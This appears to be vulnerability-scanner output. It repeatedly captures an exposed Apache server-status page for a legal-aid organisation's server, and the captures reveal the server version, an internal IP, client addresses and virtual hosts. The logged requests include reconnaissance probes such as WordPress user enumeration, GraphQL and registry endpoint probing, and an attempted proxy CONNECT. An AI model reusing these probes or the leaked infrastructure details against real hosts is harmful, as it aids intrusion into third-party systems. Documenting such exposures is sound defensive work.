0.00818179300.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00818179200.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00818179100.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00818179000.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00818178900.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001277412800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001277412700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001277412600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001277412500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001277412400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001277412300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001277412200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001277412100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001277412000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001277411900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001277411800.00.00294.75 ::1h
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021d2a0823c
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 02-Nov-2025 06:54:02 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 573 Parent Server MPM Generation: 572 Server uptime: 571 days 13 hours 59 minutes 29 seconds Server load: 0.00 0.00 0.00 Total accesses: 13746278 - Total Traffic: 195.2 GB CPU Usage: u332.32 s28.54 cu0 cs0 - .000731% CPU load .278 requests/sec - 4244 B/second - 14.9 kB/request 1 requests currently being processed, 5 idle workers W____.........._................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5722195724/24/811342W 0.000026.90.0313427.63 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 1-572219620/0/788307_ 12.821740100.00.0013042.10 209.38.136.82http/1.1atlantalegalaid.org:8080\x16\x03\x01\x01\xb4\x01 2-572219460/1/756647_ 0.0087200.00.0012883.37 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-572219470/1/738790_ 0.0030100.00.0012361.17 205.210.31.131http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-572221090/0/719326_ 3.738772660.00.0011845.58 209.38.136.82http/1.1atlantalegalaid.org:8080\x16\x03\x03\x01\x99\x01 5-571-0/0/698797. 3.492994200.00.0011533.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-571-0/0/659504. 5.8417401810.00.0010855.38 209.38.136.82http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01\x9a\x01 7-571-0/0/634575. 3.792994500.00.0010363.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-571-0/0/602597. 3.032994400.00.009780.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-571-0/0/582782. 7.4617402620.00.009181.14 209.38.136.82http/1.1atlantalegalaid.org:8080\x16\x03\x01 10-571-0/0/513786. 16.521740460.00.008725.59 3.172.23.22http/1.1elearning.alas.org:8080GET / HTTP/1.1 11-571-0/0/478266. 4.70174000.00.007886.19 209.38.136.82http/1.1atlantalegalaid.org:8080\x16\x03\x03\x01H\x01 12-571-0/0/414513. 4.641401600.00.006563.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-571-0/0/328355. 7.626298100.00.004779.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-571-0/0/289314. 6.266298000.00.004301.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-572219520/1/265039_ 0.003500.00.003774.21 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 16-571-0/0/230286. 15.062994300.00.003429.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-571-0/0/167508. 0.007638800.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-571-0/0/145385. 0.007638700.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-571-0/0/137586. 0.007638600.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-571-0/0/128255. 0.007638500.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-571-0/0/116726. 0.007638400.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0036629200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0036628900.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0036629100.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0036628800.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00159744500.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00159744400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00159744300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00159744100.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00159744200.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00159744000.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82804912200.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00812052000.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15801864000.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0680369406620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23803694000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00812055500.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00812055300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32803694010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00812055400.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00812055200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00812055100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00812055000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00812054900.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00812054800.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001271288700.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001271288600.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001271288500.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001271288400.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001271288300.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001271288200.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001271288100.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001271288000.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001271287900.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001271287800.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001271287700.00.00294.75 ::1http/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02134648064
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 01-Nov-2025 06:20:39 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 571 Parent Server MPM Generation: 570 Server uptime: 570 days 13 hours 26 minutes 6 seconds Server load: 0.00 0.00 0.00 Total accesses: 13744409 - Total Traffic: 195.1 GB CPU Usage: u296.56 s25.42 cu0 cs0 - .000653% CPU load .279 requests/sec - 4250 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ...__W_.___..___................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-570-0/0/811083. 5.132399200.00.0013421.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-570-0/0/788154. 6.892399400.00.0013037.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-570-0/0/756496. 2.072399700.00.0012877.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-57063660/33/738625_ 4.1521533040.00.8712353.75 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql HTTP/1.1 4-57066150/29/719148_ 3.4321512700.00.7311839.50 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 5-5701061725/41/698756W 2.470027.90.6311532.12 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 6-57086430/28/659402_ 4.7021522650.01.3810851.05 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/graphql HTTP/1.1 7-570-0/0/634508. 0.692399300.00.0010359.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-57086530/34/602513_ 5.0521512650.01.369777.11 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 9-57063710/72/582567_ 5.1021532740.01.039172.39 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 10-570118170/21/513688_ 3.3521261610.00.868722.93 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-570-0/0/478230. 1.182399600.00.007884.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-570-0/0/414490. 0.762399500.00.006562.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-57063500/47/328303_ 7.8421392690.02.124777.48 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 14-570118320/10/289277_ 1.51388311690.00.734299.83 3.172.105.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 15-570118370/11/264924_ 1.7638813010.00.563768.15 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 16-567-0/0/230198. 0.0027789300.00.003425.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-567-0/0/167507. 0.0027789100.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-567-0/0/145384. 0.0027789000.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-567-0/0/137585. 0.0027790400.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-567-0/0/128254. 0.0027790300.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-567-0/0/116725. 0.0027790200.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0027788900.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0027788600.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0027788800.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0027788500.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00150904200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00150904100.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00150904000.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00150903800.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00150903900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00150903700.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82796071900.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00803211700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15793023700.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0679485376620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23794853700.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00803215200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00803215000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32794853710080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00803215100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00803214900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00803214800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00803214700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00803214600.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00803214500.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001262448400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001262448300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001262448200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001262448100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001262448000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001262447900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001262447800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001262447700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001262447600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001262447500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0012624474
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021384002f7
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 29-Oct-2025 11:11:21 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 569 Parent Server MPM Generation: 568 Server uptime: 567 days 18 hours 16 minutes 48 seconds Server load: 0.00 0.00 0.00 Total accesses: 13743228 - Total Traffic: 195.1 GB CPU Usage: u333.62 s29.28 cu0 cs0 - .00074% CPU load .28 requests/sec - 4270 B/second - 14.9 kB/request 1 requests currently being processed, 7 idle workers ______...W_..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-568244160/52/811003_ 5.772100.01.2013418.64 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 1-568244170/20/788058_ 3.851267490.01.4813034.62 130.176.137.70http/1.1elearning.alas.org:8080GET / HTTP/1.1 2-568246830/25/756396_ 6.6029675630.02.3912875.31 70.132.1.135http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-568244220/36/738544_ 9.1429874530.02.7412350.90 70.132.1.135http/1.1events.alas.org:8080GET /@vite/env HTTP/1.1 4-568246910/29/719057_ 7.6129834660.02.3611836.88 70.132.1.135http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 5-568246970/11/698635_ 2.2829985160.00.6711528.09 70.132.1.135http/1.1events.alas.org:8080POST /api/gql HTTP/1.1 6-567-0/0/659345. 9.523612500.00.0010848.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-567-0/0/634415. 21.863612600.00.0010355.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-567-0/0/602444. 16.89171797970.00.009774.46 70.132.1.135http/1.1events.alas.org:8080POST /api/graphql HTTP/1.1 9-5682442724/69/582426W 2.440026.90.719169.03 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-568244320/53/513622_ 4.4329794730.01.488720.74 70.132.1.135http/1.1events.alas.org:8080GET /_all_dbs HTTP/1.1 11-567-0/0/478195. 1.22171797760.00.007883.59 70.132.1.135http/1.1events.alas.org:8080POST /graphql HTTP/1.1 12-567-0/0/414473. 3.52171797700.00.006561.63 70.132.1.135http/1.1events.alas.org:8080POST /graphql/api HTTP/1.1 13-567-0/0/328211. 1.87171797830.00.004774.13 70.132.1.135http/1.1events.alas.org:8080POST /api/gql HTTP/1.1 14-567-0/0/289254. 0.003613600.00.004298.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-567-0/0/264905. 0.003613400.00.003767.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-567-0/0/230198. 0.003613500.00.003425.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-567-0/0/167507. 0.003613300.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-567-0/0/145384. 0.003613200.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-567-0/0/137585. 0.003614600.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-567-0/0/128254. 0.003614500.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-567-0/0/116725. 0.003614400.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.003613100.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.003612800.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.003613000.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.003612700.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00126728400.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00126728300.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00126728200.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00126728000.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00126728100.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00126727900.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82771896100.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00779035900.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15768847900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0677067796620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23770677900.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00779039400.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00779039200.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32770677910080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00779039300.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00779039100.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00779039000.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00779038900.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00779038800.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00779038700.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001238272600.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001238272500.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001238272400.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001238272300.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001238272200.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001238272100.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001238272000.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001238271900.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001238271800.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001238271700.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00123827160
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0210388f83c
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 28-Oct-2025 10:15:05 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 568 Parent Server MPM Generation: 567 Server uptime: 566 days 17 hours 20 minutes 31 seconds Server load: 0.00 0.00 0.00 Total accesses: 13741627 - Total Traffic: 195.1 GB CPU Usage: u307.94 s25.67 cu0 cs0 - .000681% CPU load .281 requests/sec - 4277 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _____.W____..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-567163080/16/810889_ 2.985513000.00.8513414.51 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql HTTP/1.1 1-567163140/15/787842_ 2.965492560.00.8513026.56 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 2-567163220/31/756320_ 5.875342650.01.7712870.69 70.132.4.80http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 3-567163270/14/738361_ 2.265492650.00.5312344.30 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 4-567163320/14/718968_ 2.435461710.00.6611832.15 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1761645951.562917947769165 5-567-0/0/698544. 4.32461700.00.0011524.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-5671626725/37/659285W 2.270028.00.7010846.46 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 7-567162610/29/634329_ 5.205221520.01.4510351.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-567162850/20/602313_ 3.795502590.01.119769.13 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 9-567170680/20/582175_ 3.665402450.01.059163.49 70.132.4.80http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 10-567170730/9/513374_ 1.615502680.00.398714.68 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/graphql HTTP/1.1 11-566-0/0/478189. 4.392733000.00.007883.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-566-0/0/414454. 15.052732600.00.006560.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-566-0/0/328201. 2.00138032590.00.004773.70 149.40.49.208http/1.1 14-567-0/0/289252. 3.55461600.00.004298.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-566-0/0/264903. 0.872732400.00.003767.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-566-0/0/230196. 1.08138031590.00.003425.32 185.198.240.153http/1.1 17-566-0/0/167505. 0.003526600.00.002333.62 